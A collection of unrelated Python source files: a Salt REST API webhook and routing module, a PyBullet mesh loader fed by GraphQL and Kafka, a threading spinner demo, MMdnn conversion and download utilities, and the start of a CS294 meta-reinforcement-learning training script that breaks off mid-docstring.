self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request**::
% curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``http://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in self.url_map.items():
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.cors_tool.on': True,
},
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
mesh.py
|
import os
import stat
import math
import time
import yaml
import json
import random
import urllib
import shutil
import logging
import argparse
import threading
from urllib.error import HTTPError
from http.client import InvalidURL
from graphqlclient import GraphQLClient
from kafka import KafkaProducer, KafkaConsumer
from .graphql import getCurrentGeometry
class MeshLoader():
"""
Loads Mesh Data into a PyBullet environment
Can refetch mesh data periodically
"""
def __init__(self, config):
self.robots = {}
self.subscription_ids = []
self.building_id = config["building_id"]
self.geometry_endpoint = config["Geometry"]["host"]
self.graphql_client = GraphQLClient(config["API"]["host"])
self.token = config["API"]["token"]
self.kafka_endpoint = config["Kafka"]["host"]
self.kafka_client = None
self.robot_positions = {}
self.threads = []
def __del__(self):
"""Stop all the threads"""
for t in self.threads:
t.join()
def fetch(self):
result = self._get_current_geometry(backoff=10, nfailures=5)
result = json.loads(result)
geometry = []
if result['data']['meshesOfBuilding'] is None:
raise ValueError("Geometry API returned bad geometry data")
for mesh in result['data']['meshesOfBuilding']:
logging.debug('Loading {}'.format(mesh['name']))
directory = mesh['geometry']['directory']
filename = mesh['geometry']['filename']
# Hack to avoid None errors
if mesh["type"]=="robot":
filename = "turtlebot.obj"
directory = "./geometry/robots/turtlebot2/"
# End hack
if directory is None:
raise ValueError("Could not load {}: Directory was invalid".format(name))
if filename is None:
raise ValueError("Could not load {}: Filename was invalid".format(name))
# PyBullet can not load GLTF
if mesh['geometry']['filetype'] in ['gltf', 'glb']:
filename = filename.replace('.glb','.dae')
filename = filename.replace('.gltf','.dae')
relative_url = os.path.join(directory, filename)
relative_url = relative_url.strip('./')
position = self._convert_position(mesh)
name = mesh['name']
url = os.path.join(self.geometry_endpoint, relative_url)
fp = os.path.join('/tmp/', relative_url)
try:
print("Downloading",url,fp)
self._download_geometry_resource(url, fp)
except HTTPError as e:
logging.error("Could not load {}:\n{}".format(name, e))
continue
except InvalidURL as e:
logging.error("Could not load {}:\n{}".format(name, e))
continue
except Exception as e:
print(e)
geometry.append({
'id': mesh['id'],
'name': name,
'type': mesh['type'],
'scale': mesh['scale'],
'mesh_path': fp,
'position': position,
'is_stationary': mesh['physics']['stationary'],
'is_simulated': mesh['physics']['simulated'],
'orientation': mesh['theta'],
})
return geometry
def cached(self, max_age=120):
"""
Return the cached (potentially old) geometry data
@max_age: The maximum age to cache this data (in seconds)
"""
pathname = '/tmp/geometry_cache.json'
if os.path.exists(pathname):
age = time.time() - os.stat(pathname)[stat.ST_MTIME]
if age < max_age:
logging.warn("Returning cached geometry from {0:.1f}s ago".format(age))
with open(pathname) as fp:
try:
return json.load(fp)
except json.decoder.JSONDecodeError:
logging.warn("Invalid geometry cache file")
geometry = self.fetch()
with open(pathname,'w') as fp:
json.dump(geometry, fp)
return geometry
def _convert_position(self, position):
"""
Convert the position from GraphQL form to PyBullet
"""
return [
position['x'],
position['z'],
position['y']
]
def _get_current_geometry(self, backoff=10, nfailures=5):
"""
Fetch the current geometry resource
Supports exponential backoff
@backoff: Time to wait before trying again
@nfailures: Number of failues before throwing an error
"""
for i in range(nfailures):
try:
params = {"building_id": self.building_id}
return self.graphql_client.execute(getCurrentGeometry, params)
except HTTPError:
wait = backoff*1.5**i + backoff*random.random()
logging.warning("Geometry request failed. Trying again in %i seconds"%wait)
time.sleep(backoff*1.5**i)
# Try one last time and let any errors throw
return self.graphql_client.execute(getCurrentGeometry)
def _download_geometry_resource(self, url, local_filepath):
"""
Download the file from `url` and save it locally under `file_name`
"""
if os.path.exists(local_filepath):
logging.debug("Defaulting to cached file {}".format(local_filepath))
return
logging.debug("{} -> {}".format(url, local_filepath))
os.makedirs(os.path.dirname(local_filepath), exist_ok=True)
with urllib.request.urlopen(url) as response, open(local_filepath, 'wb') as out_file:
shutil.copyfileobj(response, out_file)
def subscribe_robot_position(self):
"""
Setup subscription to robot positions
Must be called before getting robot position
"""
args = (self.robot_positions, self.kafka_endpoint)
t = threading.Thread(target=kafka_robot_worker, args=args)
t.start()
self.threads.append(t)
def get_robot_position(self, robot_id):
"""
Return the last seen position of this robot
Uses Kafka to minimize latency
"""
if robot_id in self.robot_positions:
return self.robot_positions[robot_id]
return None
def kafka_robot_worker(robot_positions, kafka_endpoint):
topic = "robot.events.odom"
kafka_consumer = KafkaConsumer(topic, bootstrap_servers=kafka_endpoint)
kafka_consumer.subscribe("robot.events.odom")
for msg in kafka_consumer:
command = json.loads(msg.value)
robot_id = command["robot"]["id"]
position = command["pose"]["pose"]["position"].values()
orientation = command["pose"]["pose"]["orientation"].values()
robot_positions[robot_id] = {
"position": list(position),
"orientation": list(orientation),
}
|
spinner_thread.py
|
"""
Des:python asyncio_18 线程实现
Date: 2021.05.17
"""
# 线程实现
import os
import sys
import time
import threading
from itertools import cycle
class Singal:
done = False
def thinking():
time.sleep(3)
return 42
def print_think(msg, singal):
for i in cycle('- \ | / '):
status = i + " " + msg
sys.stdout.write(status)
sys.stdout.flush()
sys.stdout.write('\x08'* len(status))
time.sleep(.2)
if singal.done == True:
break
sys.stdout.write(' '* len(status) + '\x08'*len(status))
def supervisor():
singal = Singal()
threading.Thread()
spinner = threading.Thread(target=print_think, args=('thinking',singal))
print("spinner obj", spinner)
spinner.start()
result = thinking()
singal.done = True
spinner.join()
return result
if __name__ == '__main__':
result = supervisor()
print("Answer =", result)
|
utils.py
|
#----------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#----------------------------------------------------------------------------------------------
from __future__ import division
import os
import sys
import numpy as np
from six import text_type, binary_type, integer_types
import mmdnn.conversion.common.IR.graph_pb2 as graph_pb2
__all__ = ["assign_IRnode_values", "convert_onnx_pad_to_tf", 'convert_tf_pad_to_onnx',
'compute_tf_same_padding', 'is_valid_padding', 'download_file',
'shape_to_list', 'list_to_shape']
def assign_attr_value(attr, val):
from mmdnn.conversion.common.IR.graph_pb2 import TensorShape
'''Assign value to AttrValue proto according to data type.'''
if isinstance(val, bool):
attr.b = val
elif isinstance(val, integer_types):
attr.i = val
elif isinstance(val, float):
attr.f = val
elif isinstance(val, binary_type) or isinstance(val, text_type):
if hasattr(val, 'encode'):
val = val.encode()
attr.s = val
elif isinstance(val, TensorShape):
attr.shape.MergeFromString(val.SerializeToString())
elif isinstance(val, list):
if not val: return
if isinstance(val[0], integer_types):
attr.list.i.extend(val)
elif isinstance(val[0], TensorShape):
attr.list.shape.extend(val)
elif isinstance(val[0], float):
attr.list.f.extend(val)
else:
raise NotImplementedError('AttrValue cannot be of list[{}].'.format(val[0]))
elif isinstance(val, np.ndarray):
assign_attr_value(attr, val.tolist())
else:
raise NotImplementedError('AttrValue cannot be of %s' % type(val))
def assign_IRnode_values(IR_node, val_dict):
for name, val in val_dict.items():
assign_attr_value(IR_node.attr[name], val)
# For padding
def convert_tf_pad_to_onnx(pads):
pads = np.reshape(pads, -1).tolist()
dims = len(pads)
assert dims % 2 == 0
ret = []
for idx in range(0, dims, 2):
ret.append(pads[idx])
for idx in range(1, dims, 2):
ret.append(pads[idx])
return ret
def convert_onnx_pad_to_tf(pads):
return np.transpose(np.array(pads).reshape([2, -1])).reshape(-1, 2).tolist()
def is_valid_padding(pads):
return sum(np.reshape(pads, -1)) == 0
def shape_to_list(shape):
return [dim.size for dim in shape.dim]
def list_to_shape(shape):
ret = graph_pb2.TensorShape()
for dim in shape:
new_dim = ret.dim.add()
new_dim.size = dim
return ret
def compute_tf_same_padding(input_shape, kernel_shape, strides, data_format='NHWC'):
""" Convert [SAME] padding in tensorflow, keras to onnx pads,
i.e. [x1_begin, x2_begin...x1_end, x2_end,...] """
# print (input_shape)
# print (kernel_shape)
# print (strides)
if data_format.startswith('NC'):
# Not tested
input_shape = input_shape[2:]
remove_dim = len(strides) - len(input_shape)
if remove_dim > 0:
strides = strides[remove_dim::]
else:
input_shape = input_shape[1:-1]
remove_dim = len(input_shape) - len(strides) + 1
if remove_dim < 0:
strides = strides[1:remove_dim]
# print (input_shape)
# print (kernel_shape)
# print (strides)
up_list = [0]
down_list = [0]
for idx in range(0, len(input_shape)):
# kernel_shape[idx] = (kernel_shape[idx] - 1) * dilation_rate + 1
output_shape = (input_shape[idx] + strides[idx] - 1) // strides[idx]
this_padding = (output_shape - 1) * strides[idx] + kernel_shape[idx] - input_shape[idx]
this_padding = max(0, this_padding)
up_list.append(this_padding // 2)
down_list.append(this_padding - this_padding // 2)
# print ([0] + up_list + [0] + down_list if data_format.startswith('NC') else up_list + [0] + down_list + [0])
# print ('-----------------------------------------------------')
return [0] + up_list + [0] + down_list if data_format.startswith('NC') else up_list + [0] + down_list + [0]
# network library
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def _progress_check(count, block_size, total_size):
read_size = count * block_size
read_size_str = sizeof_fmt(read_size)
if total_size > 0:
percent = int(count * block_size * 100 / total_size)
percent = min(percent, 100)
sys.stdout.write("\rprogress: {} downloaded, {}%.".format(read_size_str, percent))
if read_size >= total_size:
sys.stderr.write("\n")
else:
sys.stdout.write("\rprogress: {} downloaded.".format(read_size_str))
sys.stdout.flush()
def _single_thread_download(url, file_name):
from six.moves import urllib
result, _ = urllib.request.urlretrieve(url, file_name, _progress_check)
return result
def _downloader(start, end, url, filename):
import requests
headers = {'Range': 'bytes=%d-%d' % (start, end)}
r = requests.get(url, headers=headers, stream=True)
with open(filename, "r+b") as fp:
fp.seek(start)
var = fp.tell()
fp.write(r.content)
def _multi_thread_download(url, file_name, file_size, thread_count):
import threading
fp = open(file_name, "wb")
fp.truncate(file_size)
fp.close()
part = file_size // thread_count
for i in range(thread_count):
start = part * i
if i == thread_count - 1:
end = file_size
else:
end = start + part
t = threading.Thread(target=_downloader, kwargs={'start': start, 'end': end, 'url': url, 'filename': file_name})
t.setDaemon(True)
t.start()
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is main_thread:
continue
t.join()
return file_name
def download_file(url, directory='./', local_fname=None, force_write=False, auto_unzip=False, compre_type=''):
"""Download the data from source url, unless it's already here.
Args:
filename: string, name of the file in the directory.
work_directory: string, path to working directory.
source_url: url to download from if file doesn't exist.
Returns:
Path to resulting file.
"""
if not os.path.isdir(directory):
os.mkdir(directory)
if not local_fname:
k = url.rfind('/')
local_fname = url[k + 1:]
local_fname = os.path.join(directory, local_fname)
if os.path.exists(local_fname) and not force_write:
print ("File [{}] existed!".format(local_fname))
return local_fname
else:
print ("Downloading file [{}] from [{}]".format(local_fname, url))
try:
import wget
ret = wget.download(url, local_fname)
print ("")
except:
ret = _single_thread_download(url, local_fname)
if auto_unzip:
if ret.endswith(".tar.gz") or ret.endswith(".tgz"):
try:
import tarfile
tar = tarfile.open(ret)
tar.extractall(directory)
tar.close()
except:
print("Unzip file [{}] failed.".format(ret))
elif ret.endswith('.zip'):
try:
import zipfile
zip_ref = zipfile.ZipFile(ret, 'r')
zip_ref.extractall(directory)
zip_ref.close()
except:
print("Unzip file [{}] failed.".format(ret))
return ret
"""
r = requests.head(url)
try:
file_size = int(r.headers['content-length'])
return _multi_thread_download(url, local_fname, file_size, 5)
except:
# not support multi-threads download
return _single_thread_download(url, local_fname)
return result
"""
|
train_policy.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
Adapted for use in CS294-112 Fall 2018 HW5 by Kate Rakelly and Michael Chang
"""
import numpy as np
import pdb
import random
import pickle
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
from replay_buffer import ReplayBuffer, PPOReplayBuffer
from point_mass import PointEnv
from point_mass_observed import ObservedPointEnv
#============================================================================================#
# Utilities
#============================================================================================#
def minimize_and_clip(optimizer, objective, var_list, clip_val=10):
"""
minimized `objective` using `optimizer` w.r.t. variables in
`var_list` while ensure the norm of the gradients for each
variable is clipped to `clip_val`
"""
gradients = optimizer.compute_gradients(objective, var_list=var_list)
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, clip_val), var)
return optimizer.apply_gradients(gradients)
def build_mlp(x, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None, regularizer=None):
"""
builds a feedforward neural network
arguments:
x: placeholder variable for the state (batch_size, input_size)
regularizer: regularization for weights
(see `build_policy()` for rest)
returns:
output placeholder of the network (the result of a forward pass)
"""
i = 0
for i in range(n_layers):
x = tf.layers.dense(inputs=x,units=size, activation=activation, name='fc{}'.format(i), kernel_regularizer=regularizer, bias_regularizer=regularizer)
x = tf.layers.dense(inputs=x, units=output_size, activation=output_activation, name='fc{}'.format(i + 1), kernel_regularizer=regularizer, bias_regularizer=regularizer)
return x
def build_rnn(x, h, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None, regularizer=None):
"""
builds a gated recurrent neural network
inputs are first embedded by an MLP then passed to a GRU cell
make MLP layers with `size` number of units
make the GRU with `output_size` number of units
use `activation` as the activation function for both MLP and GRU
arguments:
(see `build_policy()`)
hint: use `build_mlp()`
"""
#====================================================================================#
# ----------PROBLEM 2----------
#====================================================================================#
# YOUR CODE HERE
with tf.variable_scope(scope):
mlp = build_mlp(x, output_size, scope, n_layers, size, activation, output_activation, regularizer)
gru = tf.nn.rnn_cell.GRUCell(num_units=output_size, activation=activation) #.build(inputs_shape=(None, output_size))
x, hidden_state = tf.nn.dynamic_rnn(cell=gru, inputs=mlp, dtype=tf.float32, initial_state=h)
x = x[:, -1, :]
return x,hidden_state
# with tf.variable_scope(scope):
# mlp = build_mlp(x, x.get_shape()[-1], scope, n_layers, size, activation, output_activation, regularizer)
# gru = tf.nn.rnn_cell.GRUCell(num_units=h.shape[1], activation=activation).build(inputs_shape=(h.shape[0], ))
# x, hidden_state = tf.nn.dynamic_rnn(cell=gru, input=mlp, dtype=tf.float32, initial_state=h)
# x = x[:, -1, :]
# return x,hidden_state
#gru_cell = tf.nn.rnn_cell.GRUCell(num_units=h.shape[1], activation=activation).build(inputs_shape=(h.shape[0], ))
# tf.nn.dynamic_rnn(ce)
# x = build_mlp(x, output_size=output_size, scope=scope, n_layers=n_layers, size=size, activation=activation, output_activation=output_activation, regularizer=regularizer)
def build_policy(x, h, output_size, scope, n_layers, size, gru_size, recurrent=True, activation=tf.tanh, output_activation=None):
"""
build recurrent policy
arguments:
x: placeholder variable for the input, which has dimension (batch_size, history, input_size)
h: placeholder variable for the hidden state, which has dimension (batch_size, gru_size)
output_size: size of the output layer, same as action dimension
scope: variable scope of the network
n_layers: number of hidden layers (not counting recurrent units)
size: dimension of the hidden layer in the encoder
gru_size: dimension of the recurrent hidden state if there is one
recurrent: if the network should be recurrent or feedforward
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
n.b. we predict both the mean and std of the gaussian policy, and we don't want the std to start off too large
initialize the last layer of the policy with a guassian init of mean 0 and std 0.01
"""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if recurrent:
x, h = build_rnn(x, h, gru_size, scope, n_layers, size, activation=activation, output_activation=activation)
else:
x = tf.reshape(x, (-1, x.get_shape()[1]*x.get_shape()[2]))
x = build_mlp(x, gru_size, scope, n_layers + 1, size, activation=activation, output_activation=activation)
x = tf.layers.dense(x, output_size, activation=output_activation, kernel_initializer=tf.initializers.truncated_normal(mean=0.0, stddev=0.01), bias_initializer=tf.zeros_initializer(), name='decoder')
return x, h
def build_critic(x, h, output_size, scope, n_layers, size, gru_size, recurrent=True, activation=tf.tanh, output_activation=None, regularizer=None):
"""
build recurrent critic
arguments:
regularizer: regularization for weights
(see `build_policy()` for rest)
n.b. the policy and critic should not share weights
"""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if recurrent:
x, h = build_rnn(x, h, gru_size, scope, n_layers, size, activation=activation, output_activation=output_activation, regularizer=regularizer)
else:
x = tf.reshape(x, (-1, x.get_shape()[1]*x.get_shape()[2]))
x = build_mlp(x, gru_size, scope, n_layers + 1, size, activation=activation, output_activation=activation, regularizer=regularizer)
x = tf.layers.dense(x, output_size, activation=output_activation, name='decoder', kernel_regularizer=regularizer, bias_regularizer=regularizer)
return x
def pathlength(path):
return len(path["reward"])
def discounted_return(reward, gamma):
discounts = gamma**np.arange(len(reward))
return sum(discounts * reward)
def discount_cumsum(x, discount):
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.task_dim = computation_graph_args['task_dim']
self.reward_dim = 1
self.terminal_dim = 1
self.meta_ob_dim = self.ob_dim + self.ac_dim + self.reward_dim + self.terminal_dim
self.scope = 'continuous_logits'
self.size = computation_graph_args['size']
self.gru_size = computation_graph_args['gru_size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.history = computation_graph_args['history']
self.num_value_iters = computation_graph_args['num_value_iters']
self.l2reg = computation_graph_args['l2reg']
self.recurrent = computation_graph_args['recurrent']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.nn_critic = estimate_return_args['nn_critic']
self.normalize_advantages = estimate_return_args['normalize_advantages']
self.replay_buffer = ReplayBuffer(100000, [self.history, self.meta_ob_dim], [self.ac_dim], self.gru_size, self.task_dim)
self.val_replay_buffer = ReplayBuffer(100000, [self.history, self.meta_ob_dim], [self.ac_dim], self.gru_size, self.task_dim)
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
placeholders for batch batch observations / actions / advantages in policy gradient
loss function.
see Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for meta-observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
sy_hidden: placeholder for RNN hidden state
(PPO stuff)
sy_lp_n: placeholder for pre-computed log-probs
sy_fixed_lp_n: placeholder for pre-computed old log-probs
"""
sy_ob_no = tf.placeholder(shape=[None, self.history, self.meta_ob_dim], name="ob", dtype=tf.float32)
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
sy_hidden = tf.placeholder(shape=[None, self.gru_size], name="hidden", dtype=tf.float32)
sy_lp_n = tf.placeholder(shape=[None], name="logprob", dtype=tf.float32)
sy_fixed_lp_n = tf.placeholder(shape=[None], name="fixed_logprob", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n, sy_hidden, sy_lp_n, sy_fixed_lp_n
def policy_forward_pass(self, sy_ob_no, sy_hidden):
"""
constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.history, self.meta_ob_dim)
sy_hidden: (batch_size, self.gru_size)
returns:
the parameters of the policy.
the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
"""
# ac_dim * 2 because we predict both mean and std
sy_policy_params, sy_hidden = build_policy(sy_ob_no, sy_hidden, self.ac_dim*2, self.scope, n_layers=self.n_layers, size=self.size, gru_size=self.gru_size, recurrent=self.recurrent)
return (sy_policy_params, sy_hidden)
def sample_action(self, policy_parameters):
"""
constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
returns:
sy_sampled_ac:
(batch_size, self.ac_dim)
"""
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean), 0, 1)
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
"""
constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_lp_n: (batch_size)
"""
sy_mean, sy_logstd = policy_parameters
sy_lp_n = tfp.distributions.MultivariateNormalDiag(
loc=sy_mean, scale_diag=tf.exp(sy_logstd)).log_prob(sy_ac_na)
return sy_lp_n
def build_computation_graph(self):
"""
notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_lp_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n, self.sy_hidden, self.sy_lp_n, self.sy_fixed_lp_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
policy_outputs = self.policy_forward_pass(self.sy_ob_no, self.sy_hidden)
self.policy_parameters = policy_outputs[:-1]
# unpack mean and variance
self.policy_parameters = tf.split(self.policy_parameters[0], 2, axis=1)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_lp_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
# PPO critic update
critic_regularizer = tf.contrib.layers.l2_regularizer(1e-3) if self.l2reg else None
self.critic_prediction = tf.squeeze(build_critic(self.sy_ob_no, self.sy_hidden, 1, 'critic_network', n_layers=self.n_layers, size=self.size, gru_size=self.gru_size, recurrent=self.recurrent, regularizer=critic_regularizer))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_weights = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='critic_network')
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
# PPO actor update
self.sy_fixed_log_prob_n = tf.placeholder(shape=[None], name="fixed_log_prob", dtype=tf.float32)
self.policy_surr_loss = self.ppo_loss(self.sy_lp_n, self.sy_fixed_lp_n, self.sy_adv_n)
self.policy_weights = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.scope)
optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.policy_update_op = minimize_and_clip(optimizer, self.policy_surr_loss, var_list=self.policy_weights, clip_val=40)
def sample_trajectories(self, itr, env, min_timesteps, is_evaluation=False):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
stats = []
while True:
animate_this_episode=(len(stats)==0 and (itr % 10 == 0) and self.animate)
steps, s = self.sample_trajectory(env, animate_this_episode, is_evaluation=is_evaluation)
stats += s
timesteps_this_batch += steps
if timesteps_this_batch > min_timesteps:
break
return stats, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode, is_evaluation):
"""
sample a task, then sample trajectories from that task until either
max(self.history, self.max_path_length) timesteps have been sampled
construct meta-observations by concatenating (s, a, r, d) into one vector
inputs to the policy should have the shape (batch_size, self.history, self.meta_ob_dim)
zero pad the input to maintain a consistent input shape
